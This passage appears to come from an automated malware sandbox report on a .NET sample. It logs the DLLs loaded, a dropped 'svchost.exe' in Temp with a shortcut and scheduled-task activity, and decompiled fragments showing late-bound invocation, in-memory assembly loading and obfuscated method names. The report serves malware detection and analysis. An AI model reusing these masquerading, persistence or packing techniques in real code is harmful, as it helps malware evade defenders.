Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Section loaded: avicap32.dll Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Section loaded: msvfw32.dll Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 Jump to behavior
Source: svchost.lnk.0.dr LNK file: ..\..\..\..\..\..\Local\Temp\svchost.exe
Source: WV7Gj9lJ7W.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: WV7Gj9lJ7W.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation
barindex
.NET source code contains method to dynamically call methods (often used by packers)
Source: WV7Gj9lJ7W.exe, A5mGmKUxuoZHpACMaJkGzmT0Z3P0T1NPya007kG9JHQQX.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Njv73KX784FjKnNf2Gc98sSHOj18YdGcf2Byy2gkbIZUXntiVeuAR0ax5pZ1.hFys3whJzriUf5ffzfq4sandjR0Z92w61Gcp3Yc68DtjQTN9aRSgWyhEzwDg,Njv73KX784FjKnNf2Gc98sSHOj18YdGcf2Byy2gkbIZUXntiVeuAR0ax5pZ1.TdNnE5PTBxhagKPbAXYqgEqRuvCsrciyCd5wczJGARcQYOQNI4nybPVo9qdm,Njv73KX784FjKnNf2Gc98sSHOj18YdGcf2Byy2gkbIZUXntiVeuAR0ax5pZ1._7ZXzm3PoEKGNeo868rQTBPBt7EFSfUj56oetzqNfT2KEVSBSppWtch2U62WQ,Njv73KX784FjKnNf2Gc98sSHOj18YdGcf2Byy2gkbIZUXntiVeuAR0ax5pZ1.wMoBRJlmgtBr8JQshhrpOocFhX98AsHlGediDxukZblznU4AayL3CMwa2qdc,GiAmC40B13JgmF6UXFFKMPWATVLvv65v727AW1ocLFYsRDQPyyTbwRDgqgPrBPqfKlg14hVgQR56p.asBqSKDtJW5J1besvqLIMYFLeyiattIOqvylViz8brRue5AKoSGlTw2O8oBY4S5LCMrcRc2tkYseA()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: WV7Gj9lJ7W.exe, A5mGmKUxuoZHpACMaJkGzmT0Z3P0T1NPya007kG9JHQQX.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{_4YAiW2j9vJzg72PzC2aZLmHIRxmbqWXZ3zH0rdzVGE5DZ[2],GiAmC40B13JgmF6UXFFKMPWATVLvv65v727AW1ocLFYsRDQPyyTbwRDgqgPrBPqfKlg14hVgQR56p.exMiHafrLan5NN3O3Us5Z6wanpcHz3qAzqKm182BzZeQNSpLzgWeqX1SMdkMzRIu5a6EvZ1lu6dwC(Convert.FromBase64String(_4YAiW2j9vJzg72PzC2aZLmHIRxmbqWXZ3zH0rdzVGE5DZ[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: svchost.exe.0.dr, A5mGmKUxuoZHpACMaJkGzmT0Z3P0T1NPya007kG9JHQQX.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Njv73KX784FjKnNf2Gc98sSHOj18YdGcf2Byy2gkbIZUXntiVeuAR0ax5pZ1.hFys3whJzriUf5ffzfq4sandjR0Z92w61Gcp3Yc68DtjQTN9aRSgWyhEzwDg,Njv73KX784FjKnNf2Gc98sSHOj18YdGcf2Byy2gkbIZUXntiVeuAR0ax5pZ1.TdNnE5PTBxhagKPbAXYqgEqRuvCsrciyCd5wczJGARcQYOQNI4nybPVo9qdm,Njv73KX784FjKnNf2Gc98sSHOj18YdGcf2Byy2gkbIZUXntiVeuAR0ax5pZ1._7ZXzm3PoEKGNeo868rQTBPBt7EFSfUj56oetzqNfT2KEVSBSppWtch2U62WQ,Njv73KX784FjKnNf2Gc98sSHOj18YdGcf2Byy2gkbIZUXntiVeuAR0ax5pZ1.wMoBRJlmgtBr8JQshhrpOocFhX98AsHlGediDxukZblznU4AayL3CMwa2qdc,GiAmC40B13JgmF6UXFFKMPWATVLvv65v727AW1ocLFYsRDQPyyTbwRDgqgPrBPqfKlg14hVgQR56p.asBqSKDtJW5J1besvqLIMYFLeyiattIOqvylViz8brRue5AKoSGlTw2O8oBY4S5LCMrcRc2tkYseA()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: svchost.exe.0.dr, A5mGmKUxuoZHpACMaJkGzmT0Z3P0T1NPya007kG9JHQQX.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{_4YAiW2j9vJzg72PzC2aZLmHIRxmbqWXZ3zH0rdzVGE5DZ[2],GiAmC40B13JgmF6UXFFKMPWATVLvv65v727AW1ocLFYsRDQPyyTbwRDgqgPrBPqfKlg14hVgQR56p.exMiHafrLan5NN3O3Us5Z6wanpcHz3qAzqKm182BzZeQNSpLzgWeqX1SMdkMzRIu5a6EvZ1lu6dwC(Convert.FromBase64String(_4YAiW2j9vJzg72PzC2aZLmHIRxmbqWXZ3zH0rdzVGE5DZ[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
.NET source code contains potential unpacker
Source: WV7Gj9lJ7W.exe, A5mGmKUxuoZHpACMaJkGzmT0Z3P0T1NPya007kG9JHQQX.cs .Net Code: VpeO8tTOEv4iDsN3sQAY1HlnIybRgPGr45wl2qtybq0GP System.AppDomain.Load(byte[])
Source: WV7Gj9lJ7W.exe, A5mGmKUxuoZHpACMaJkGzmT0Z3P0T1NPya007kG9JHQQX.cs .Net Code: CjNu4V7rW7TNejKoUG6MzPu3LKIzheMmxW3F4jpogfZqh System.AppDomain.Load(byte[])
Source: WV7Gj9lJ7W.exe, A5mGmKUxuoZHpACMaJkGzmT0Z3P0T1NPya007kG9JHQQX.cs .Net Code: CjNu4V7rW7TNejKoUG6MzPu3LKIzheMmxW3F4jpogfZqh
Source: svchost.exe.0.dr, A5mGmKUxuoZHpACMaJkGzmT0Z3P0T1NPya007kG9JHQQX.cs .Net Code: VpeO8tTOEv4iDsN3sQAY1HlnIybRgPGr45wl2qtybq0GP System.AppDomain.Load(byte[])
Source: svchost.exe.0.dr, A5mGmKUxuoZHpACMaJkGzmT0Z3P0T1NPya007kG9JHQQX.cs .Net Code: CjNu4V7rW7TNejKoUG6MzPu3LKIzheMmxW3F4jpogfZqh System.AppDomain.Load(byte[])
Source: svchost.exe.0.dr, A5mGmKUxuoZHpACMaJkGzmT0Z3P0T1NPya007kG9JHQQX.cs .Net Code: CjNu4V7rW7TNejKoUG6MzPu3LKIzheMmxW3F4jpogfZqh
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 5_2_00007FFD9B8A00BD pushad ; iretd 5_2_00007FFD9B8A00C1
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 9_2_00007FFD9B8A00BD pushad ; iretd 9_2_00007FFD9B8A00C1
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 11_2_00007FFD9B8900BD pushad ; iretd 11_2_00007FFD9B8900C1
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 12_2_00007FFD9B8A00BD pushad ; iretd 12_2_00007FFD9B8A00C1
Source: WV7Gj9lJ7W.exe, 27nQSNX0HYY6kClZEDjv.cs High entropy of concatenated method names: 'ueqQqejJterhoHm1K1Jy', 'FeELXdV4V5TjgQQ6okzA', 'w56uiyv9mk97wBLCBUpy', 'wZVMIBp6mrg9dO2oZucojhhHDEWvqQZUHMRZI', 'Co7Gtn8ZvgJDb6ZvQf6LESdxREpOnkh1WZJvt', 'ElnyCMggM8MKTh0D6qPHPlDjBzxBnX7RL2uMz', 'GDsVpslrxrSf0fKTh6U10jwits0f29D58vgOm', 'UZCN52VB9MgUUWC5bR3jULzpLfWpKdBWNxSEl', '_4ymlMh3d0VjJ29vjUGQ5iZb5UZ12m4arohsYR', 'Xi13qzePlUtqsRazdJbJgFYSK916d3Z7Tm40S'
Source: WV7Gj9lJ7W.exe, MX9MPbJBnyOxLe7MYhq37R4NjeJWR2ZJdXjYr4UsDzVbLrue6sPA1La6LKal.cs High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'xo1kf4Jx30YPVKNDUt6W', 'FrCO0gWCI3Cc129MlUiJ', 'VCe1cecq1AUIncRNW2g0', 'kz8Gz8qF90ulGQNXgN7q'
Source: WV7Gj9lJ7W.exe, 316U38w4QVmq2sHFnBvkd4LieyieRq76dn2Kimj2SAfAl.cs High entropy of concatenated method names: 'hI9KT6csSEYaPv773xBYfKRtTKNVnU7dJn8Qp7EhP9o8D', 'lEZz5agvylve7hksOkLER989WBvtK7k47gcAiIoovQbyf2w8px3wk2BFpD6525UdCuvfpN2sgvMP00OCkrZ7K0hzO3EQqMa', 'qThp3Tnp9uL3mCcx2RKuJOmWtl45lRIvOF9dn1VfKP4GUZGNAE2peaPzu6ACiRMvAZijeLhApv2fylmlEDm0IpwTEDX49yl', '_8Ok5pYSWOD96ESoPqEFtnEDOaH6skpryUVavXewN6tTmHaUVo9u2GANNMKwoYypuNmSwcWOkHXOURN6CNuhWPnjxInE7uF8', '_6YuBy37IC7jwy9VRa0lxGiDaoZtqy93ayCJfcLWCuwbXmNIVfj3VIGIFyG3dOMObHLIc64sjxELzJ2fcJZ0tXMsTSoQ1G4v'
Source: WV7Gj9lJ7W.exe, ake8eTev2BMeufFpdYvXz1rggei7SGsicHjO2bESD2ok5TLhCDsYXlIFx6fvqouj8uy8v8luRiBFk.cs High entropy of concatenated method names: 'YYHDR1FlBjBxXOU39qSvS1EcsQh0tj8gM35gmXuZITmuiPk08Lm78xWkFCYLoEb3zCUSMok6n8Pz3', 'VDfFRo8LYl1tIXFA06Is3iUDeWnzk1ge8Klc9j3EikbSyEv5jSSlbeFcLIsx826PuEyDRYQKfK5yQ', 'tBSpzoYaZ38vEVkNARodMehzxQe0HGo9Fh3I2', 'c4mbtuvxK9W16V045BYBHgfKZc4cfE26553dq', 'uJ1TmU8R3cr3rAutD0RpanDoSqLqmjn0dnqog', '_3k0jFaralJt9bZKXRcPcjgCnPx3FPWpHraTEk'
Source: WV7Gj9lJ7W.exe, cSNl319mLCwHfhwaDWRYhnKG8D3oxANewMPCBZ2pid1LPBXyU3ptz6Bh9XCQ5pUwwZOVIjaKEPlJe.cs High entropy of concatenated method names: 'knTr5CJmVp8X9Ko4GZ7ckQNOEhaAynFQXlojQjbSxyl6OhyyDttZrHspfT6xQHm9BOS3diXSEYNSj', 'l66FIfebctAmOjmY7AtDWwoehjmyLESp9Q7ABrsRINsdXHbENH3vJWlYj8DmXd1gwPJS5erC32HOw', 'weMfLXyg4oTWv5b8kh8dYP2K7WshUjVvSn6AK6VNwu8umcIenO7s7tFITnWeBXfd48CZ5M3RLXIAU', 'rkq8Va3BA7apdfvH3rnX9doZlXOicZYXqnyfcDPvBeEls1t7ms86njfHIJOOSwsyr2B4JI4ugQHUY', 'qzBVRY0F1Da1G0Kepxt7anYKc5eHxOc6FffmL', 'TED3M9IaM0EnSj6YZgk3fv5dubsZ9Agoh3plW', 'Yk46pcnFd76Nc6AQvsO7LcEfWflt7KQyxFvcz', 'T66YrvMTGMmZQ8J0zkbd118JJVsitKhmjzGZm', 'VFlaKlbCgpAuH3kfCBnvtwECtfXz7cihAcr9M', 'XicSwzaAyuqo3OkjMsrJSrZFOEiadmmrqpZH1'
Source: WV7Gj9lJ7W.exe, mEMctJ62dLnMaiPT5KFDAPnsIeuT2SibjV9v92SvruauN.cs High entropy of concatenated method names: 'caZZO7FJB5MgNZYKU7bnFPUmIpW7O3OotbdwueTCPaMDv', 'BWYSgwbdewN1Pj1kRtkXa0yQRt8tLYfQvQwLkKaIJ23ml', 'lMjfsbGxsPuryCxLroIgnXKI3BuA0yywVGKZuU6K5Ym1J', 'mDqu5hS6MIPrQmdl8W5xJabrXw5gkQ8laFVX1pqQCSQPa', 'GyZxcfiQcIFyhJ5KcOw5GVLO1M1os0lW9cAYHiVhklyA1', '_2lLgZlRHpSLWJrC1Q3m0iTtekc14PWgkBoifcONOZOlfG', 'MadPtqRY4CELmJv147dyqfAg2KWeRalVvHXrqAVHChpNr', 'TxyJCy9MVL77OtF6ImM2zYCw2uAHzDOUxvRakni6npGzo', 'JkIzOegnMmo3s68MzID2gqKw3MGQVGKwC8cQqNCMdf6QY', 'iVDPnAhG6ZdGZzb88qVpk6rDBRr76OEqFn4YMW88zmC7B'
Source: WV7Gj9lJ7W.exe, CJam979yUJ3BepXKxOYvRdOc3MuWKQ1MQpVdlrMnmtC8lCvyWDcRTyQ8DvkW.cs High entropy of concatenated method names: 'LPhiDpGNyupk0QkTJeRDXuAXKk4nZt8S7gmxwZHwaEyqOaCNeE2QcCfLrl2b', 'ZsbMZDmnYIyQzomYcwRhK9DDlwuIy5BYf2rlu7c8uwLhR8R8wO5Zp5QDrg8X', 'q2w1fq2KFMMamsZ6xiMch4B4urGzjjpGxlvQbNDXbBQlzANIStPXANe31EiU', 'teJw5EvhYnucnVqv9E67QSiuB2xkrWyyR8L5kK40GRPwUk3E2703WSSjy60q', 'jo9ARCBqotH12u4jiSrikMJ99HOlIpwcdC5tktu7JtfPeSe9uu7mhAZMPCw9', '_2qkCczNsQvHiRJmqh4e6GA9IKK5YYFT3ttq9XNIhOmBvwiBGS7uoCWPIfX5o', 'shecwU6o120NPfi6qrrKEPcXovd6dSgPxySAbGyB5aMkJqs2JaWT3lfGNAgF', 'QyjxGFi7lmx4DuYz8HRgQFz4PJg7wYXqVzYHiUMED8aolhTTlFzBKRZdUeLq', 'HW08iqc39U4VFyArbSBvUymM4FMSR4RpIRTKd3PlGIQwVbAzPPdo9Y4imupc', 'J7ZlavZodWZZQra3fPoAKEvgOiTjqWW54JG7F1TQUxyDI'
Source: WV7Gj9lJ7W.exe, OtdwFnwcQUOqdXCzEXT2iHWY6m7TnezmZ9KWNrTeti2sF.cs High entropy of concatenated method names: 'gsjBXZ37xlu3Pgbwrtg4vL41gtNEaPYaFrlk5KV5K7J7Q', 'rDaGax8TnhfgWhb96TG1vEf0gYpyPGm2OzPfSfrp7JvXr', 'rZk0So3B2qBGNsETvguKChb4BbBP8n7tNslq5LVdLouVN', 'ngkVjhYXgOlHrLuTBFz85U0aIAX1FJjOrvI9E8was4gsn', 'fGxoP2NJQ6e3T8FmZrsKfyD32VUbvvT6hy6TTTlLgmpJS', 'CAEtjMlryCB8plQS4BwkRkfNpvgBqGMCNnA1ALbP7Epil', '_31rX662av2ICwVBfdXsJYMw6U4vpgGIYoxYW2mx9V4fRO', 'MCbZWakKPYzbmlCSIysGx7rnE7Awv6xtyohayUMfQus14', 'd28o9r0Y568Yqc9UaUWgauleK6wX7zqOliWYLh9FosoU8', 'ry5ytayEO67BvgZTs0giQjzjxF1hXl4lGcPO58Ntu6Evv'
Source: WV7Gj9lJ7W.exe, A5mGmKUxuoZHpACMaJkGzmT0Z3P0T1NPya007kG9JHQQX.cs High entropy of concatenated method names: 'TqHoBHLeqk1ykJYWtDmzAvlbMZPfwaJUMDRdTqgk7MxFz', 'VpeO8tTOEv4iDsN3sQAY1HlnIybRgPGr45wl2qtybq0GP', 'ajFESKUOmlFLcJlAhY3aiK2rnBPoAmmtL7OCOhOsMSD7w', 'NUXnfVPIauOXEHNj99T919xlIVaZuXns9d1ZYKqWm16lN', 'xwPEpln1nibh4UhRM7kvXTf5vsGRdbjn1IONVe4qcVQHv', 'yXeXianhbNU40Kyrt7w1cPV2K6OeqDjj1JhkgWtLs2Chn', 'SK0pcMI6yma9l8Hp5jHoMZGpCfwbWDANtHuJ2Kh3y0OCt', 'EnwCf6xKrXQ1ZYb5XnSAU7cDURaYrekOdgByfbaG17EtA', '_0r7GaoOFubOWhewAz3YGBaDffErs351I9gCTCL3weWTpX', '_3puQ2eaZ6vEXyDvqKd3gwyJu3z5l3YC4WYsE0djfynr2B'
Source: WV7Gj9lJ7W.exe, CAwAkHv2L9O24ZkL3o8yl2OMHnLL8juDUedYdDoMnoeapLDAWUrvcizzw9fV8raypt27ZJiYHXrCK.cs High entropy of concatenated method names: 'eHJHSZbUFMHuDlsgt06d9ymOkD9rB7winu9BcMTSYaUwUdFYDrVHT4NS1KEc7WdCQcPha83kSWQPx', 'DBwTzVYAj0OlXZD7iKREHEQzm9iVJxP9JaI8y', 't4Pt0laeFIKZ1drk6fylwVxBDN7Bu4Ogj7LW4', 'FC1hCksYTeqI5YEvizv2lkSf36OOnmkj2LfWf', '_6eKKeAz5qdwuHhXipOpE8sbds97HV8zYbRSxv'
Source: WV7Gj9lJ7W.exe, GiAmC40B13JgmF6UXFFKMPWATVLvv65v727AW1ocLFYsRDQPyyTbwRDgqgPrBPqfKlg14hVgQR56p.cs High entropy of concatenated method names: 'ds3aGKgg1oiG6NqZOeTJuOlHCWHkAGVFdvjQ0EswmB29Hkw1fNzaZnSwyXR29uHtmN1QIvEEvh9iB', 'eDbv3OxSnYNivcZ1H9KT8kLfKwPXn63H7kLnJnJ44HijwhwmIWhGxbHUe239z9rIEnXHHcfAGTtpo', 'ZoVtxeSHR42WIpJCL1sglvgjf3AMH73YZx9UWpY3XorYNiRo7KW4STDzjA6yBQVCKGx3JIuXgf2QH', 'zUOykfwxJ07CoUYchVWmMqUhoDCv5Ik62ZQR4BRwOVBgRgsmUq5MwhV2mSFPB9UqBTzQ8pPq2eEvd', 'DKpA8fcq9OZEWLyqzR1G4J0CWUNEmAAwPt44eWHPalrTwxeolZ9mpJM6NXwntFas9mrWNlKkLsC7t', 'zb9c9G1YiJKqRtvBdtHeclNxmKjZCYJOE4b9obVuWLFduTy8GwB2QiRVOgCMpAS3AiPbM6XaMDoRz', 'jvm8pxvCwJVxGBwQ20W0GUv6mmWGpGau9qeUi8dsyqCBMiGsXWC9cxmX2bx5t3Akeln1A5AiRg83E', '_5tvOB8IKfSaR8yUijr3gsJ0ALECffPvW29mvpobrc5s1IvX9lr94I4oQ6Sme4pyTeJSigZjW4YJCS', 'YJzGPkrabKVcrFBkGIyFk25PMRE9BUZKYdRswpPLuQ3XGz4ZgzFkJ1z342K6DjFKYCo8j06v7LZlf', 'EihXhbaK7HgJ5FqKQdiV7I5LEpvOMIjISpUqMghjafuXOCuKRVaO7MgyeiM3d5qGagL9NXXQhHBkR'
Source: WV7Gj9lJ7W.exe, C4gGYUvWN18G9l2hocBF2CWYzbPPKT1kTmJi83nHjcK6eRA10zBaeiiN3XvONpq260iicDMmpvue1.cs High entropy of concatenated method names: 'AddClipboardFormatListener', 'SetParent', '_4AwoLb8w8tjx5jKViAlbKypkkKXIuHLucONq8Z6hZ6fCh6mfSOX4WOufslFXQxyQkWyiWBZVFaFuA', 'uQUdpik0SrcOqNytG3RkVvn9VDtGdnnbsLcHY', 'KnwawU5cr7z9TvPKtF2xxO4DecOSX70nXOvZa', '_9VKDxMdtfmJSWPqZ0R42jXCg5Vo9NAqfCabzh', 'yFcSURPynt5k8LnL2H4XQya3yflF7DxrmXVgN'
Source: svchost.exe.0.dr, 27nQSNX0HYY6kClZEDjv.cs High entropy of concatenated method names: 'ueqQqejJterhoHm1K1Jy', 'FeELXdV4V5TjgQQ6okzA', 'w56uiyv9mk97wBLCBUpy', 'wZVMIBp6mrg9dO2oZucojhhHDEWvqQZUHMRZI', 'Co7Gtn8ZvgJDb6ZvQf6LESdxREpOnkh1WZJvt', 'ElnyCMggM8MKTh0D6qPHPlDjBzxBnX7RL2uMz', 'GDsVpslrxrSf0fKTh6U10jwits0f29D58vgOm', 'UZCN52VB9MgUUWC5bR3jULzpLfWpKdBWNxSEl', '_4ymlMh3d0VjJ29vjUGQ5iZb5UZ12m4arohsYR', 'Xi13qzePlUtqsRazdJbJgFYSK916d3Z7Tm40S'
Source: svchost.exe.0.dr, MX9MPbJBnyOxLe7MYhq37R4NjeJWR2ZJdXjYr4UsDzVbLrue6sPA1La6LKal.cs High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'xo1kf4Jx30YPVKNDUt6W', 'FrCO0gWCI3Cc129MlUiJ', 'VCe1cecq1AUIncRNW2g0', 'kz8Gz8qF90ulGQNXgN7q'
